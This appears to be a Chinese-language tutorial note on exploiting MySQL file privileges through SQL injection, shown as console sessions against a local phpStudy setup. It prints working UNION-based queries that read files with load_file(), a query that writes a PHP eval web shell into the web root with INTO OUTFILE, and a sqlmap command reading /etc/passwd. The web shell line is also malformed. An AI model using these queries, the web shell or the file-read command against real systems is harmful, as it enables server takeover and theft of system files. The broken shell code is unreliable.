读写的条件:
1.secure_file_priv 的值不能是null
2.知道读写的绝对路径
3.最好是高权限(root)
查看secure_file_priv 的值
mysql> show global variables like '%secure%';
+------------------+------------------------------+
| Variable_name | Value |
+------------------+------------------------------+
| secure_auth | OFF |
| secure_file_priv | C:\phpStudy\PHPTutorial\WWW\ |
+------------------+------------------------------+
2 rows in set (0.00 sec)
空值得话,可以打开my.ini把它写进去
secure_file_priv = 'C:\phpStudy\PHPTutorial\WWW '
查看权限
mysql> select * from admin where id = 1 union select 1,user(),3;
+------+----------------+----------+
| id | username | password |
+------+----------------+----------+
| 1 | admin | 123 |
| 1 | root@localhost | 3 |
+------+----------------+----------+
2 rows in set (0.00 sec)
读取文件内容
mysql> select * from admin where id = 1 union select 1,load_file("C:\\phpStudy\\PHPTutorial\\WWW\\1.txt"),3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | 123 |
| 1 | 11111 | 3 |
+------+----------+----------+
2 rows in set (0.00 sec)
写入文件
mysql> select * from admin where id = 1 union select 1,"<?php @eval($_GET['x']; ?)>",3 into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\1.php';
Query OK, 2 rows affected (0.00 sec)
执行成功,该目录下生成了我们写的1.php
验证是否可以执行
sqlmap读取文件
–file-read用法用于读取本地文件
sqlmap.py -u "http://xxx/x?id=1" --file-read=/etc/passwd